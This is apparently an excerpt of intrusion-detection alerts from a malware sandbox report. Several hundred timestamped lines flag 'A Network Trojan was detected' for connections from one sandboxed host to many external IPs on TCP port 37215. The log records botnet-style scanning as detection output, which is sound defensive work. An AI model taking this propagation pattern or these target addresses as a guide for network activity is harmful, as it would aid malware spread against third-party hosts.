                  2024-09-21T15:21:37.300469+020028352221A Network Trojan was detected192.168.2.1432828157.252.7.16037215TCP
                  2024-09-21T15:21:37.796880+020028352221A Network Trojan was detected192.168.2.1447326197.238.125.4637215TCP
                  2024-09-21T15:21:38.474501+020028352221A Network Trojan was detected192.168.2.1435128205.219.56.16937215TCP
                  2024-09-21T15:21:38.486986+020028352221A Network Trojan was detected192.168.2.1443000197.176.116.19937215TCP
                  2024-09-21T15:21:38.488147+020028352221A Network Trojan was detected192.168.2.1458170197.49.48.24437215TCP
                  2024-09-21T15:21:38.503922+020028352221A Network Trojan was detected192.168.2.1450880197.190.241.22037215TCP
                  2024-09-21T15:21:38.531171+020028352221A Network Trojan was detected192.168.2.144489441.9.221.9437215TCP
                  2024-09-21T15:21:38.546971+020028352221A Network Trojan was detected192.168.2.1460116197.126.197.13437215TCP
                  2024-09-21T15:21:38.554285+020028352221A Network Trojan was detected192.168.2.1443098197.158.113.17537215TCP
                  2024-09-21T15:21:38.688125+020028352221A Network Trojan was detected192.168.2.1435570143.221.123.2737215TCP
                  2024-09-21T15:21:38.708977+020028352221A Network Trojan was detected192.168.2.143506068.52.110.7237215TCP
                  2024-09-21T15:21:38.750211+020028352221A Network Trojan was detected192.168.2.1436364148.195.158.21837215TCP
                  2024-09-21T15:21:38.753928+020028352221A Network Trojan was detected192.168.2.1449800197.13.32.14737215TCP
                  2024-09-21T15:21:38.782210+020028352221A Network Trojan was detected192.168.2.1460928197.85.207.5437215TCP
                  2024-09-21T15:21:38.801065+020028352221A Network Trojan was detected192.168.2.144121453.195.182.9037215TCP
                  2024-09-21T15:21:38.802514+020028352221A Network Trojan was detected192.168.2.1435660197.110.255.2237215TCP
                  2024-09-21T15:21:38.831990+020028352221A Network Trojan was detected192.168.2.1459280157.190.221.2737215TCP
                  2024-09-21T15:21:38.864394+020028352221A Network Trojan was detected192.168.2.1444614157.97.88.9337215TCP
                  2024-09-21T15:21:38.864402+020028352221A Network Trojan was detected192.168.2.143349041.18.156.12737215TCP
                  2024-09-21T15:21:38.864413+020028352221A Network Trojan was detected192.168.2.144584670.125.138.4137215TCP
                  2024-09-21T15:21:38.864432+020028352221A Network Trojan was detected192.168.2.144667041.142.219.4037215TCP
                  2024-09-21T15:21:38.864432+020028352221A Network Trojan was detected192.168.2.1453290197.127.38.21437215TCP
                  2024-09-21T15:21:39.704715+020028352221A Network Trojan was detected192.168.2.143546241.229.203.4237215TCP
                  2024-09-21T15:21:39.705910+020028352221A Network Trojan was detected192.168.2.1444424157.57.176.22337215TCP
                  2024-09-21T15:21:39.719817+020028352221A Network Trojan was detected192.168.2.1433720157.22.228.23537215TCP
                  2024-09-21T15:21:39.738530+020028352221A Network Trojan was detected192.168.2.1458194220.34.151.1237215TCP
                  2024-09-21T15:21:39.750676+020028352221A Network Trojan was detected192.168.2.1434656157.39.226.1937215TCP
                  2024-09-21T15:21:39.781132+020028352221A Network Trojan was detected192.168.2.1449760157.62.211.23137215TCP
                  2024-09-21T15:21:39.796815+020028352221A Network Trojan was detected192.168.2.144852241.225.20.11737215TCP
                  2024-09-21T15:21:39.816531+020028352221A Network Trojan was detected192.168.2.1450288157.199.80.20937215TCP
                  2024-09-21T15:21:39.829771+020028352221A Network Trojan was detected192.168.2.143847441.122.207.12737215TCP
                  2024-09-21T15:21:39.845606+020028352221A Network Trojan was detected192.168.2.1455572197.189.27.6937215TCP
                  2024-09-21T15:21:39.889087+020028352221A Network Trojan was detected192.168.2.1443694157.93.156.3937215TCP
                  2024-09-21T15:21:39.889093+020028352221A Network Trojan was detected192.168.2.1439944197.122.35.20137215TCP
                  2024-09-21T15:21:39.889109+020028352221A Network Trojan was detected192.168.2.1432944157.242.226.8637215TCP
                  2024-09-21T15:21:39.889110+020028352221A Network Trojan was detected192.168.2.1438622222.206.161.20837215TCP
                  2024-09-21T15:21:39.889130+020028352221A Network Trojan was detected192.168.2.1434530197.93.253.1837215TCP
                  2024-09-21T15:21:39.889144+020028352221A Network Trojan was detected192.168.2.1446740156.42.227.17137215TCP
                  2024-09-21T15:21:39.889152+020028352221A Network Trojan was detected192.168.2.1434522157.212.97.5337215TCP
                  2024-09-21T15:21:39.889164+020028352221A Network Trojan was detected192.168.2.143992441.15.201.13937215TCP
                  2024-09-21T15:21:39.889166+020028352221A Network Trojan was detected192.168.2.14537502.175.149.9037215TCP
                  2024-09-21T15:21:39.889166+020028352221A Network Trojan was detected192.168.2.146065441.94.35.23837215TCP
                  2024-09-21T15:21:39.889180+020028352221A Network Trojan was detected192.168.2.1456210157.195.123.3037215TCP
                  2024-09-21T15:21:39.889182+020028352221A Network Trojan was detected192.168.2.1440930197.54.199.15737215TCP
                  2024-09-21T15:21:39.889194+020028352221A Network Trojan was detected192.168.2.144896841.18.84.16937215TCP
                  2024-09-21T15:21:39.889201+020028352221A Network Trojan was detected192.168.2.143560050.187.83.20537215TCP
                  2024-09-21T15:21:39.889214+020028352221A Network Trojan was detected192.168.2.1448272197.195.132.9037215TCP
                  2024-09-21T15:21:39.889221+020028352221A Network Trojan was detected192.168.2.1438996157.170.152.13037215TCP
                  2024-09-21T15:21:39.889231+020028352221A Network Trojan was detected192.168.2.1458262157.74.189.137215TCP
                  2024-09-21T15:21:39.889241+020028352221A Network Trojan was detected192.168.2.1448564197.208.145.2537215TCP
                  2024-09-21T15:21:39.889249+020028352221A Network Trojan was detected192.168.2.1433796157.117.1.5337215TCP
                  2024-09-21T15:21:39.889250+020028352221A Network Trojan was detected192.168.2.1455158157.182.129.8137215TCP
                  2024-09-21T15:21:39.889260+020028352221A Network Trojan was detected192.168.2.1438730157.158.9.21937215TCP
                  2024-09-21T15:21:39.889277+020028352221A Network Trojan was detected192.168.2.144735241.83.9.21237215TCP
                  2024-09-21T15:21:39.889278+020028352221A Network Trojan was detected192.168.2.1438426157.17.50.23337215TCP
                  2024-09-21T15:21:39.889290+020028352221A Network Trojan was detected192.168.2.1438446197.105.96.7637215TCP
                  2024-09-21T15:21:39.889305+020028352221A Network Trojan was detected192.168.2.1452896157.106.198.15037215TCP
                  2024-09-21T15:21:39.889305+020028352221A Network Trojan was detected192.168.2.145992641.142.111.2837215TCP
                  2024-09-21T15:21:39.889316+020028352221A Network Trojan was detected192.168.2.1448672157.96.246.14237215TCP
                  2024-09-21T15:21:39.889325+020028352221A Network Trojan was detected192.168.2.145318241.33.168.8537215TCP
                  2024-09-21T15:21:39.889341+020028352221A Network Trojan was detected192.168.2.1443214197.72.156.13237215TCP
                  2024-09-21T15:21:39.889354+020028352221A Network Trojan was detected192.168.2.1447232197.189.148.21437215TCP
                  2024-09-21T15:21:39.889357+020028352221A Network Trojan was detected192.168.2.145296264.1.246.3837215TCP
                  2024-09-21T15:21:39.889372+020028352221A Network Trojan was detected192.168.2.1455084157.205.117.23037215TCP
                  2024-09-21T15:21:39.889372+020028352221A Network Trojan was detected192.168.2.143731241.195.251.18937215TCP
                  2024-09-21T15:21:39.889389+020028352221A Network Trojan was detected192.168.2.1450472157.89.132.21737215TCP
                  2024-09-21T15:21:39.889400+020028352221A Network Trojan was detected192.168.2.1447366157.169.85.6937215TCP
                  2024-09-21T15:21:39.889400+020028352221A Network Trojan was detected192.168.2.1455556157.171.205.11537215TCP
                  2024-09-21T15:21:39.889419+020028352221A Network Trojan was detected192.168.2.145268041.46.106.14337215TCP
                  2024-09-21T15:21:39.889424+020028352221A Network Trojan was detected192.168.2.1450178103.138.134.2537215TCP
                  2024-09-21T15:21:39.889430+020028352221A Network Trojan was detected192.168.2.144212841.239.43.12137215TCP
                  2024-09-21T15:21:39.889438+020028352221A Network Trojan was detected192.168.2.145929841.243.168.14237215TCP
                  2024-09-21T15:21:40.890057+020028352221A Network Trojan was detected192.168.2.1443874157.213.119.18237215TCP
                  2024-09-21T15:21:40.906191+020028352221A Network Trojan was detected192.168.2.1446536100.241.120.10637215TCP
                  2024-09-21T15:21:40.906608+020028352221A Network Trojan was detected192.168.2.1440076197.243.94.24537215TCP
                  2024-09-21T15:21:40.906725+020028352221A Network Trojan was detected192.168.2.1435196157.61.93.21437215TCP
                  2024-09-21T15:21:40.907884+020028352221A Network Trojan was detected192.168.2.145486041.91.227.4137215TCP
                  2024-09-21T15:21:40.907954+020028352221A Network Trojan was detected192.168.2.1456122111.54.70.2137215TCP
                  2024-09-21T15:21:40.908045+020028352221A Network Trojan was detected192.168.2.143704041.231.52.10637215TCP
                  2024-09-21T15:21:40.908230+020028352221A Network Trojan was detected192.168.2.14369581.36.105.20337215TCP
                  2024-09-21T15:21:40.922737+020028352221A Network Trojan was detected192.168.2.1451106197.182.212.3537215TCP
                  2024-09-21T15:21:40.923632+020028352221A Network Trojan was detected192.168.2.1446136197.40.124.18237215TCP
                  2024-09-21T15:21:41.765942+020028352221A Network Trojan was detected192.168.2.1436536157.202.133.4737215TCP
                  2024-09-21T15:21:41.766375+020028352221A Network Trojan was detected192.168.2.145855620.47.137.15237215TCP
                  2024-09-21T15:21:41.766604+020028352221A Network Trojan was detected192.168.2.143586220.142.38.10537215TCP
                  2024-09-21T15:21:41.767600+020028352221A Network Trojan was detected192.168.2.145158241.223.235.4237215TCP
                  2024-09-21T15:21:41.770027+020028352221A Network Trojan was detected192.168.2.1458870197.201.152.23937215TCP
                  2024-09-21T15:21:41.770611+020028352221A Network Trojan was detected192.168.2.1445686205.33.105.24437215TCP
                  2024-09-21T15:21:41.797186+020028352221A Network Trojan was detected192.168.2.145431241.176.41.21437215TCP
                  2024-09-21T15:21:41.798576+020028352221A Network Trojan was detected192.168.2.144893641.104.123.3937215TCP
                  2024-09-21T15:21:41.827558+020028352221A Network Trojan was detected192.168.2.1445488157.12.77.1237215TCP
                  2024-09-21T15:21:41.828866+020028352221A Network Trojan was detected192.168.2.146026841.235.139.24437215TCP
                  2024-09-21T15:21:41.875077+020028352221A Network Trojan was detected192.168.2.1437412157.118.179.23737215TCP
                  2024-09-21T15:21:41.922190+020028352221A Network Trojan was detected192.168.2.1446632157.97.55.23037215TCP
                  2024-09-21T15:21:41.922310+020028352221A Network Trojan was detected192.168.2.1433180160.83.171.737215TCP
                  2024-09-21T15:21:41.939512+020028352221A Network Trojan was detected192.168.2.1439994197.254.166.24137215TCP
                  2024-09-21T15:21:41.941175+020028352221A Network Trojan was detected192.168.2.144832241.152.104.16137215TCP
                  2024-09-21T15:21:41.957289+020028352221A Network Trojan was detected192.168.2.1451670197.52.1.4237215TCP
                  2024-09-21T15:21:41.958900+020028352221A Network Trojan was detected192.168.2.1442982157.157.39.16937215TCP
                  2024-09-21T15:21:41.968800+020028352221A Network Trojan was detected192.168.2.1441868208.22.124.17137215TCP
                  2024-09-21T15:21:42.304225+020028352221A Network Trojan was detected192.168.2.1459340197.129.25.21537215TCP
                  2024-09-21T15:21:44.593550+020028352221A Network Trojan was detected192.168.2.1457536157.172.104.3537215TCP
                  2024-09-21T15:21:44.609591+020028352221A Network Trojan was detected192.168.2.145369041.40.12.1837215TCP
                  2024-09-21T15:21:44.609792+020028352221A Network Trojan was detected192.168.2.1457224157.102.26.12737215TCP
                  2024-09-21T15:21:44.609873+020028352221A Network Trojan was detected192.168.2.1446538197.108.177.14537215TCP
                  2024-09-21T15:21:44.610974+020028352221A Network Trojan was detected192.168.2.1448056157.64.51.16337215TCP
                  2024-09-21T15:21:44.611153+020028352221A Network Trojan was detected192.168.2.143344841.192.219.7137215TCP
                  2024-09-21T15:21:44.611412+020028352221A Network Trojan was detected192.168.2.144869241.40.211.4537215TCP
                  2024-09-21T15:21:44.611445+020028352221A Network Trojan was detected192.168.2.1437606157.185.226.25137215TCP
                  2024-09-21T15:21:44.624988+020028352221A Network Trojan was detected192.168.2.1459648157.87.108.8937215TCP
                  2024-09-21T15:21:44.625056+020028352221A Network Trojan was detected192.168.2.143870641.243.107.8437215TCP
                  2024-09-21T15:21:44.625232+020028352221A Network Trojan was detected192.168.2.1450908157.20.37.10737215TCP
                  2024-09-21T15:21:44.625365+020028352221A Network Trojan was detected192.168.2.1437370197.227.91.19837215TCP
                  2024-09-21T15:21:44.625455+020028352221A Network Trojan was detected192.168.2.144696441.124.115.11637215TCP
                  2024-09-21T15:21:44.625571+020028352221A Network Trojan was detected192.168.2.1456828207.24.135.937215TCP
                  2024-09-21T15:21:44.625769+020028352221A Network Trojan was detected192.168.2.1444456197.57.155.17537215TCP
                  2024-09-21T15:21:44.625944+020028352221A Network Trojan was detected192.168.2.1456404197.1.87.11237215TCP
                  2024-09-21T15:21:44.626066+020028352221A Network Trojan was detected192.168.2.1459132157.198.197.3037215TCP
                  2024-09-21T15:21:44.626152+020028352221A Network Trojan was detected192.168.2.1440228157.70.232.15937215TCP
                  2024-09-21T15:21:44.626217+020028352221A Network Trojan was detected192.168.2.1452162197.136.51.14037215TCP
                  2024-09-21T15:21:44.626437+020028352221A Network Trojan was detected192.168.2.1448042157.166.196.13937215TCP
                  2024-09-21T15:21:44.626625+020028352221A Network Trojan was detected192.168.2.1440258197.171.234.11137215TCP
                  2024-09-21T15:21:44.626750+020028352221A Network Trojan was detected192.168.2.1457886157.0.24.10337215TCP
                  2024-09-21T15:21:44.626880+020028352221A Network Trojan was detected192.168.2.145323895.232.253.25037215TCP
                  2024-09-21T15:21:44.627345+020028352221A Network Trojan was detected192.168.2.143500441.113.81.15537215TCP
                  2024-09-21T15:21:44.627503+020028352221A Network Trojan was detected192.168.2.145931441.182.189.15237215TCP
                  2024-09-21T15:21:44.627535+020028352221A Network Trojan was detected192.168.2.1445532157.5.218.11037215TCP
                  2024-09-21T15:21:44.627643+020028352221A Network Trojan was detected192.168.2.143740441.146.138.7837215TCP
                  2024-09-21T15:21:44.627901+020028352221A Network Trojan was detected192.168.2.1440852157.174.186.20537215TCP
                  2024-09-21T15:21:44.628181+020028352221A Network Trojan was detected192.168.2.1433832160.252.236.6837215TCP
                  2024-09-21T15:21:44.628236+020028352221A Network Trojan was detected192.168.2.145481041.152.26.11437215TCP
                  2024-09-21T15:21:44.641015+020028352221A Network Trojan was detected192.168.2.1440122157.128.205.19137215TCP
                  2024-09-21T15:21:44.641210+020028352221A Network Trojan was detected192.168.2.1456826157.161.226.537215TCP
                  2024-09-21T15:21:44.641248+020028352221A Network Trojan was detected192.168.2.143553841.186.161.21337215TCP
                  2024-09-21T15:21:44.641302+020028352221A Network Trojan was detected192.168.2.1450248157.139.92.25037215TCP
                  2024-09-21T15:21:44.641580+020028352221A Network Trojan was detected192.168.2.1455272197.71.155.20437215TCP
                  2024-09-21T15:21:44.641648+020028352221A Network Trojan was detected192.168.2.1441806197.134.21.24337215TCP
                  2024-09-21T15:21:44.641671+020028352221A Network Trojan was detected192.168.2.144192241.34.135.13137215TCP
                  2024-09-21T15:21:44.641818+020028352221A Network Trojan was detected192.168.2.1438494160.192.25.24737215TCP
                  2024-09-21T15:21:44.641842+020028352221A Network Trojan was detected192.168.2.145874680.91.11.10137215TCP
                  2024-09-21T15:21:44.642158+020028352221A Network Trojan was detected192.168.2.145669087.182.120.24837215TCP
                  2024-09-21T15:21:44.642288+020028352221A Network Trojan was detected192.168.2.1450326217.177.3.24537215TCP
                  2024-09-21T15:21:44.642668+020028352221A Network Trojan was detected192.168.2.1433138157.135.73.20637215TCP
                  2024-09-21T15:21:44.993034+020028352221A Network Trojan was detected192.168.2.1437270197.58.102.13837215TCP
                  2024-09-21T15:21:44.993034+020028352221A Network Trojan was detected192.168.2.146004841.112.188.16737215TCP
                  2024-09-21T15:21:44.993056+020028352221A Network Trojan was detected192.168.2.1453098157.149.4.15437215TCP
                  2024-09-21T15:21:44.993066+020028352221A Network Trojan was detected192.168.2.145561262.225.40.3837215TCP
                  2024-09-21T15:21:44.993075+020028352221A Network Trojan was detected192.168.2.1456838197.49.232.1537215TCP
                  2024-09-21T15:21:44.993075+020028352221A Network Trojan was detected192.168.2.143450482.87.191.21237215TCP
                  2024-09-21T15:21:44.993088+020028352221A Network Trojan was detected192.168.2.1453514124.211.242.14037215TCP
                  2024-09-21T15:21:44.993093+020028352221A Network Trojan was detected192.168.2.1444138153.138.253.18637215TCP
                  2024-09-21T15:21:44.993104+020028352221A Network Trojan was detected192.168.2.1456446197.3.114.13637215TCP
                  2024-09-21T15:21:44.993104+020028352221A Network Trojan was detected192.168.2.1436188197.157.191.9837215TCP
                  2024-09-21T15:21:44.993111+020028352221A Network Trojan was detected192.168.2.1457826157.10.144.19237215TCP
                  2024-09-21T15:21:44.993111+020028352221A Network Trojan was detected192.168.2.1442666197.49.80.4237215TCP
                  2024-09-21T15:21:44.993122+020028352221A Network Trojan was detected192.168.2.1456006157.114.69.20837215TCP
                  2024-09-21T15:21:44.993127+020028352221A Network Trojan was detected192.168.2.1440934157.65.146.2537215TCP
                  2024-09-21T15:21:44.993131+020028352221A Network Trojan was detected192.168.2.143550241.88.144.16637215TCP
                  2024-09-21T15:21:44.993146+020028352221A Network Trojan was detected192.168.2.144256041.246.11.9237215TCP
                  2024-09-21T15:21:44.993149+020028352221A Network Trojan was detected192.168.2.1452250197.239.2.23837215TCP
                  2024-09-21T15:21:44.993164+020028352221A Network Trojan was detected192.168.2.1457718161.21.78.5237215TCP
                  2024-09-21T15:21:44.993165+020028352221A Network Trojan was detected192.168.2.143868241.104.196.2437215TCP
                  2024-09-21T15:21:44.993170+020028352221A Network Trojan was detected192.168.2.1444896197.177.174.21537215TCP
                  2024-09-21T15:21:44.993185+020028352221A Network Trojan was detected192.168.2.1454332197.132.18.21037215TCP
                  2024-09-21T15:21:44.993185+020028352221A Network Trojan was detected192.168.2.145135041.90.35.22637215TCP
                  2024-09-21T15:21:44.993197+020028352221A Network Trojan was detected192.168.2.1455178157.176.199.14437215TCP
                  2024-09-21T15:21:44.993206+020028352221A Network Trojan was detected192.168.2.1446604157.182.225.13037215TCP
                  2024-09-21T15:21:44.993209+020028352221A Network Trojan was detected192.168.2.1450080197.45.247.19337215TCP
                  2024-09-21T15:21:44.993225+020028352221A Network Trojan was detected192.168.2.143537862.112.161.11137215TCP
                  2024-09-21T15:21:44.993239+020028352221A Network Trojan was detected192.168.2.1451186197.43.63.4337215TCP
                  2024-09-21T15:21:44.993242+020028352221A Network Trojan was detected192.168.2.1443972197.42.6.16337215TCP
                  2024-09-21T15:21:44.993261+020028352221A Network Trojan was detected192.168.2.145566241.84.103.18937215TCP
                  2024-09-21T15:21:44.993268+020028352221A Network Trojan was detected192.168.2.1457048157.55.102.4537215TCP
                  2024-09-21T15:21:44.993310+020028352221A Network Trojan was detected192.168.2.1455538197.54.4.11737215TCP
                  2024-09-21T15:21:44.993324+020028352221A Network Trojan was detected192.168.2.1434362157.84.128.2237215TCP
                  2024-09-21T15:21:44.993331+020028352221A Network Trojan was detected192.168.2.1447274157.141.3.9737215TCP
                  2024-09-21T15:21:44.993331+020028352221A Network Trojan was detected192.168.2.1436892197.130.221.8237215TCP
                  2024-09-21T15:21:44.993342+020028352221A Network Trojan was detected192.168.2.1454218157.93.125.6237215TCP
                  2024-09-21T15:21:44.993347+020028352221A Network Trojan was detected192.168.2.144815241.76.136.14037215TCP
                  2024-09-21T15:21:44.993357+020028352221A Network Trojan was detected192.168.2.1453206197.16.104.17137215TCP
                  2024-09-21T15:21:44.993357+020028352221A Network Trojan was detected192.168.2.1450788197.159.63.16737215TCP
                  2024-09-21T15:21:44.993373+020028352221A Network Trojan was detected192.168.2.145278441.239.127.17937215TCP
                  2024-09-21T15:21:44.993373+020028352221A Network Trojan was detected192.168.2.144602665.120.208.18037215TCP
                  2024-09-21T15:21:44.993392+020028352221A Network Trojan was detected192.168.2.1449022157.76.93.8237215TCP
                  2024-09-21T15:21:44.993395+020028352221A Network Trojan was detected192.168.2.1453166157.152.57.23437215TCP
                  2024-09-21T15:21:44.993411+020028352221A Network Trojan was detected192.168.2.1457528191.102.135.2337215TCP
                  2024-09-21T15:21:44.993424+020028352221A Network Trojan was detected192.168.2.143312641.207.130.15237215TCP
                  2024-09-21T15:21:44.993438+020028352221A Network Trojan was detected192.168.2.144103094.103.214.22837215TCP
                  2024-09-21T15:21:44.993438+020028352221A Network Trojan was detected192.168.2.1460016157.71.41.19937215TCP
                  2024-09-21T15:21:44.993477+020028352221A Network Trojan was detected192.168.2.1439432157.86.124.25237215TCP
                  2024-09-21T15:21:44.993477+020028352221A Network Trojan was detected192.168.2.145281024.144.173.8737215TCP
                  2024-09-21T15:21:45.642611+020028352221A Network Trojan was detected192.168.2.1443322157.90.240.24837215TCP
                  2024-09-21T15:21:45.658071+020028352221A Network Trojan was detected192.168.2.1459156157.212.20.7737215TCP
                  2024-09-21T15:21:47.034415+020028352221A Network Trojan was detected192.168.2.1450642157.34.65.13137215TCP
                  2024-09-21T15:21:47.833789+020028352221A Network Trojan was detected192.168.2.1454158167.179.94.6937215TCP
                  2024-09-21T15:21:47.959234+020028352221A Network Trojan was detected192.168.2.1440574197.227.71.24137215TCP
                  2024-09-21T15:21:48.077938+020028352221A Network Trojan was detected192.168.2.1440468157.7.92.2537215TCP
                  2024-09-21T15:21:48.077950+020028352221A Network Trojan was detected192.168.2.1453680197.176.12.9937215TCP
                  2024-09-21T15:21:48.077954+020028352221A Network Trojan was detected192.168.2.1445020156.75.98.5537215TCP
                  2024-09-21T15:21:48.077963+020028352221A Network Trojan was detected192.168.2.1450910161.123.159.6837215TCP
                  2024-09-21T15:21:48.077965+020028352221A Network Trojan was detected192.168.2.143454082.100.27.25137215TCP
                  2024-09-21T15:21:48.077975+020028352221A Network Trojan was detected192.168.2.1459262157.198.166.19037215TCP
                  2024-09-21T15:21:48.077990+020028352221A Network Trojan was detected192.168.2.1441918157.255.234.12737215TCP
                  2024-09-21T15:21:48.077994+020028352221A Network Trojan was detected192.168.2.1449478197.68.84.25237215TCP
                  2024-09-21T15:21:48.078000+020028352221A Network Trojan was detected192.168.2.143684441.166.167.9537215TCP
                  2024-09-21T15:21:48.078004+020028352221A Network Trojan was detected192.168.2.1436436197.210.44.1637215TCP
                  2024-09-21T15:21:48.078017+020028352221A Network Trojan was detected192.168.2.1444456157.139.217.11337215TCP
                  2024-09-21T15:21:48.078032+020028352221A Network Trojan was detected192.168.2.145248641.140.52.18337215TCP
                  2024-09-21T15:21:48.078033+020028352221A Network Trojan was detected192.168.2.143326479.80.146.22137215TCP
                  2024-09-21T15:21:48.078043+020028352221A Network Trojan was detected192.168.2.1433508157.181.243.5737215TCP
                  2024-09-21T15:21:48.078049+020028352221A Network Trojan was detected192.168.2.1458138197.28.2.2237215TCP
                  2024-09-21T15:21:48.078078+020028352221A Network Trojan was detected192.168.2.144915841.251.172.11737215TCP
                  2024-09-21T15:21:48.078084+020028352221A Network Trojan was detected192.168.2.1434320157.152.133.19737215TCP
                  2024-09-21T15:21:48.078094+020028352221A Network Trojan was detected192.168.2.1448060163.31.219.19337215TCP
                  2024-09-21T15:21:48.078101+020028352221A Network Trojan was detected192.168.2.1442914197.232.223.10337215TCP
                  2024-09-21T15:21:48.078111+020028352221A Network Trojan was detected192.168.2.145330649.226.229.22437215TCP
                  2024-09-21T15:21:48.078114+020028352221A Network Trojan was detected192.168.2.1444268157.42.211.4637215TCP
                  2024-09-21T15:21:48.078114+020028352221A Network Trojan was detected192.168.2.143487241.57.159.7537215TCP
                  2024-09-21T15:21:48.078123+020028352221A Network Trojan was detected192.168.2.144513241.2.199.12937215TCP
                  2024-09-21T15:21:48.078134+020028352221A Network Trojan was detected192.168.2.145756647.17.24.10337215TCP
                  2024-09-21T15:21:48.078136+020028352221A Network Trojan was detected192.168.2.145659041.89.193.6437215TCP
                  2024-09-21T15:21:48.078153+020028352221A Network Trojan was detected192.168.2.1438330157.223.14.10537215TCP
                  2024-09-21T15:21:48.078161+020028352221A Network Trojan was detected192.168.2.1452616134.58.37.19637215TCP
                  2024-09-21T15:21:48.187532+020028352221A Network Trojan was detected192.168.2.145801841.211.68.5537215TCP
                  2024-09-21T15:21:48.203016+020028352221A Network Trojan was detected192.168.2.144096441.14.56.23637215TCP
                  2024-09-21T15:21:48.203067+020028352221A Network Trojan was detected192.168.2.1450280197.123.167.22137215TCP
                  2024-09-21T15:21:48.203154+020028352221A Network Trojan was detected192.168.2.1437600197.99.88.1437215TCP
                  2024-09-21T15:21:48.203264+020028352221A Network Trojan was detected192.168.2.144195441.170.75.9437215TCP
                  2024-09-21T15:21:48.203399+020028352221A Network Trojan was detected192.168.2.144997894.187.207.8737215TCP
                  2024-09-21T15:21:48.203557+020028352221A Network Trojan was detected192.168.2.1458080197.148.144.19037215TCP
                  2024-09-21T15:21:48.203798+020028352221A Network Trojan was detected192.168.2.1449772197.3.26.9037215TCP
                  2024-09-21T15:21:48.203852+020028352221A Network Trojan was detected192.168.2.1452034197.11.199.7537215TCP
                  2024-09-21T15:21:48.204005+020028352221A Network Trojan was detected192.168.2.1435470157.230.82.9737215TCP
                  2024-09-21T15:21:48.204752+020028352221A Network Trojan was detected192.168.2.145607041.144.119.11937215TCP
                  2024-09-21T15:21:48.205380+020028352221A Network Trojan was detected192.168.2.1433930165.20.75.6137215TCP
                  2024-09-21T15:21:48.219770+020028352221A Network Trojan was detected192.168.2.144777041.20.68.12337215TCP
                  2024-09-21T15:21:48.220557+020028352221A Network Trojan was detected192.168.2.1459452197.3.141.1237215TCP
                  2024-09-21T15:21:48.220667+020028352221A Network Trojan was detected192.168.2.1446316197.190.111.19137215TCP
                  2024-09-21T15:21:48.220821+020028352221A Network Trojan was detected192.168.2.1450382197.16.181.15437215TCP
                  2024-09-21T15:21:48.220925+020028352221A Network Trojan was detected192.168.2.1443384157.235.155.25137215TCP
                  2024-09-21T15:21:48.220989+020028352221A Network Trojan was detected192.168.2.1439666197.220.118.19637215TCP
                  2024-09-21T15:21:48.222859+020028352221A Network Trojan was detected192.168.2.1453106157.53.217.10937215TCP
                  2024-09-21T15:21:48.222931+020028352221A Network Trojan was detected192.168.2.143461041.102.226.18737215TCP
                  2024-09-21T15:21:48.223028+020028352221A Network Trojan was detected192.168.2.1437538220.142.233.1437215TCP
                  2024-09-21T15:21:48.223292+020028352221A Network Trojan was detected192.168.2.145478441.25.136.15037215TCP
                  2024-09-21T15:21:48.224319+020028352221A Network Trojan was detected192.168.2.1456432144.86.21.18237215TCP
                  2024-09-21T15:21:48.719064+020028352221A Network Trojan was detected192.168.2.1439104197.230.38.24637215TCP
                  2024-09-21T15:21:48.723037+020028352221A Network Trojan was detected192.168.2.1452504157.27.128.25037215TCP
                  2024-09-21T15:21:48.748352+020028352221A Network Trojan was detected192.168.2.1437454179.251.107.21237215TCP
                  2024-09-21T15:21:49.099878+020028352221A Network Trojan was detected192.168.2.1443924172.6.244.20937215TCP
                  2024-09-21T15:21:49.099920+020028352221A Network Trojan was detected192.168.2.1451502140.54.159.21337215TCP
                  2024-09-21T15:21:49.099939+020028352221A Network Trojan was detected192.168.2.144433266.193.124.19537215TCP
                  2024-09-21T15:21:49.099950+020028352221A Network Trojan was detected192.168.2.143588641.75.183.13137215TCP
                  2024-09-21T15:21:49.099971+020028352221A Network Trojan was detected192.168.2.143566041.126.32.1337215TCP
                  2024-09-21T15:21:49.099997+020028352221A Network Trojan was detected192.168.2.1439954157.162.9.15137215TCP
                  2024-09-21T15:21:49.100080+020028352221A Network Trojan was detected192.168.2.144243441.86.129.4037215TCP
                  2024-09-21T15:21:49.100089+020028352221A Network Trojan was detected192.168.2.1434208195.174.193.14237215TCP
                  2024-09-21T15:21:49.100113+020028352221A Network Trojan was detected192.168.2.1454526197.237.129.7937215TCP
                  2024-09-21T15:21:49.100124+020028352221A Network Trojan was detected192.168.2.1433422197.158.149.12537215TCP
                  2024-09-21T15:21:49.157123+020028352221A Network Trojan was detected192.168.2.145373283.121.165.20437215TCP
                  2024-09-21T15:21:49.157540+020028352221A Network Trojan was detected192.168.2.1453450157.72.108.21937215TCP
                  2024-09-21T15:21:49.157639+020028352221A Network Trojan was detected192.168.2.144147441.245.47.6337215TCP
                  2024-09-21T15:21:49.158602+020028352221A Network Trojan was detected192.168.2.1442810197.30.253.5137215TCP
                  2024-09-21T15:21:49.163455+020028352221A Network Trojan was detected192.168.2.1455124157.176.179.13437215TCP
                  2024-09-21T15:21:49.187664+020028352221A Network Trojan was detected192.168.2.1446606130.42.109.13637215TCP
                  2024-09-21T15:21:49.187878+020028352221A Network Trojan was detected192.168.2.144606641.238.39.8737215TCP
                  2024-09-21T15:21:49.188114+020028352221A Network Trojan was detected192.168.2.1438396197.85.84.25437215TCP
                  2024-09-21T15:21:49.188249+020028352221A Network Trojan was detected192.168.2.14577288.46.30.18237215TCP
                  2024-09-21T15:21:49.188278+020028352221A Network Trojan was detected192.168.2.1448660112.2.247.22437215TCP
                  2024-09-21T15:21:49.188527+020028352221A Network Trojan was detected192.168.2.145107041.145.133.4137215TCP
                  2024-09-21T15:21:49.188647+020028352221A Network Trojan was detected192.168.2.145244041.80.126.19137215TCP
                  2024-09-21T15:21:49.188756+020028352221A Network Trojan was detected192.168.2.1448774157.203.120.18237215TCP
                  2024-09-21T15:21:49.189183+020028352221A Network Trojan was detected192.168.2.1442104157.77.98.20537215TCP
                  2024-09-21T15:21:49.189485+020028352221A Network Trojan was detected192.168.2.146094041.192.202.22637215TCP
                  2024-09-21T15:21:49.192054+020028352221A Network Trojan was detected192.168.2.1456510157.100.180.13537215TCP
                  2024-09-21T15:21:49.192257+020028352221A Network Trojan was detected192.168.2.1440478197.150.223.17337215TCP
                  2024-09-21T15:21:49.194774+020028352221A Network Trojan was detected192.168.2.1443734197.232.206.22537215TCP
                  2024-09-21T15:21:49.194885+020028352221A Network Trojan was detected192.168.2.1454498157.143.177.13537215TCP
                  2024-09-21T15:21:49.209976+020028352221A Network Trojan was detected192.168.2.1447624157.24.151.21037215TCP
